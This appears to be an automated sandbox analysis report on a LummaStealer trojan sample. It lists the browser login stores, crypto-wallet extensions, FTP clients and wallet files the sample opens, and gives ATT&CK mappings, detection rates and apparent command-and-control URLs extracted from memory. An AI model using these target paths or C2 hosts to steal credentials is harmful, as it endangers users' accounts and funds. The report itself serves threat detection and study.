Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\8ZVMneG.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
              Source: Yara matchFile source: Process Memory Space: 8ZVMneG.exe PID: 2144, type: MEMORYSTR

Remote Access Functionality

Source: Yara match, File source: Process Memory Space: 8ZVMneG.exe PID: 2144, type: MEMORYSTR
Source: Yara match, File source: sslproxydump.pcap, type: PCAP
Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK Matrix

Tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact. Only the cells below carry a signature count for this sample; the number in parentheses is the count badge exactly as printed in the report.

Execution: Windows Management Instrumentation (2), Command and Scripting Interpreter (2), PowerShell (1)
Persistence: DLL Side-Loading (1)
Privilege Escalation: Process Injection (211), DLL Side-Loading (1)
Defense Evasion: Virtualization/Sandbox Evasion (11), Process Injection (211), Deobfuscate/Decode Files or Information (11), Obfuscated Files or Information (2), Software Packing (1), DLL Side-Loading (1)
Credential Access: OS Credential Dumping (2)
Discovery: System Time Discovery (1), Query Registry (1), Security Software Discovery (141), Virtualization/Sandbox Evasion (11), Process Discovery (1), File and Directory Discovery (11), System Information Discovery (33)
Collection: Archive Collected Data (1), Data from Local System (41)
Command and Control: Encrypted Channel (11), Ingress Tool Transfer (1), Non-Application Layer Protocol (3), Application Layer Protocol (114)
Antivirus detection (Source / Detection / Scanner / Label):
8ZVMneG.exe / 65% / Virustotal
8ZVMneG.exe / 71% / ReversingLabs / Win32.Trojan.LummaStealer
8ZVMneG.exe / 100% / Joe Sandbox ML
              No Antivirus matches
                                                                                                                          https://community.fastly.steamstatic.com/8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://steam.tv/8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://debonairnukk.xyz/api2H8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://lev-tolstoi.com/8ZVMneG.exe, 00000003.00000003.2463297099.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2354896716.0000000003C1C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000002.2484883630.000000000141C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2423659737.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2399977215.0000000003C1F000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2354654616.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2427078648.0000000003C1C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2402833146.0000000003C1F000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440560885.0000000003C1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://store.steampowered.com/privacy_agreement/8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://wrathful-jammy.cyou/8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://store.steampowered.com/points/shop/8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=8ZVMneG.exe, 00000003.00000003.2331522501.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2331680839.0000000003C5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://crl.rootca1.amazontrust.com/rootca1.crl08ZVMneG.exe, 00000003.00000003.2376293640.0000000003C50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://ocsp.rootca1.amazontrust.com0:8ZVMneG.exe, 00000003.00000003.2376293640.0000000003C50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://lev-tolstoi.com/;.8ZVMneG.exe, 00000003.00000003.2440607082.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440225330.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2463297099.000000000141B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://sketchfab.com8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.ecosia.org/newtab/8ZVMneG.exe, 00000003.00000003.2331522501.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2331680839.0000000003C5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://lv.queniujq.cn8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://steamcommunity.com/profiles/76561199724331900/inventory/8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br8ZVMneG.exe, 00000003.00000003.2377179600.0000000003D36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://www.youtube.com/8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://store.steampowered.com/privacy_agreement/8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.google.com/recaptcha/8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://checkout.steampowered.com/8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=lILQ2m8IgfoI&l=e8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://store.steampowered.com/;8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://store.steampowered.com/about/8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://steamcommunity.com/my/wishlist/8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://lev-tolstoi.co8ZVMneG.exe, 00000003.00000003.2483406156.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440607082.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440225330.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2463297099.000000000141B000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000002.2484883630.000000000141C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2423659737.000000000141B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://lev-tolstoi.com/Dr8ZVMneG.exe, 00000003.00000003.2423659737.000000000141B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://help.steampowered.com/en/8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://steamcommunity.com/market/8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://store.steampowered.com/news/8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=8ZVMneG.exe, 00000003.00000003.2331522501.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2331680839.0000000003C5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://store.steampowered.com/subscriber_agreement/8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://recaptcha.net/recaptcha/;8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://steamcommunity.com/discussions/8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://debonairnukk.xyz/api8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://store.steampowered.com/stats/8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=Q6Qn8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://medal.tv8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
URL | Source (memory dumps) | Malicious | Reputation
https://broadcast.st.dl.eccdnx.com | 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp; 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp | false | high
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp; 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | false | high
https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a | 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp; 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp; 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | false | high
https://store.steampowered.com/steam_refunds/ | 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp; 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | false | high
http://x1.c.lencr.org/0 | 8ZVMneG.exe, 00000003.00000003.2376293640.0000000003C50000.00000004.00000800.00020000.00000000.sdmp | false | high
http://x1.i.lencr.org/0 | 8ZVMneG.exe, 00000003.00000003.2376293640.0000000003C50000.00000004.00000800.00020000.00000000.sdmp | false | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search (two adjacent strings, extracted fused) | 8ZVMneG.exe, 00000003.00000003.2331522501.0000000003C5C000.00000004.00000800.00020000.00000000.sdmp; 8ZVMneG.exe, 00000003.00000003.2331680839.0000000003C5A000.00000004.00000800.00020000.00000000.sdmp | false | high
https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a | 8ZVMneG.exe, 00000003.00000003.2272475504.000000000140A000.00000004.00000020.00020000.00000000.sdmp; 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp; 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmp; 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | false | high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900 | 8ZVMneG.exe, 00000003.00000003.2300927099.0000000001413000.00000004.00000020.00020000.00000000.sdmp | false | high
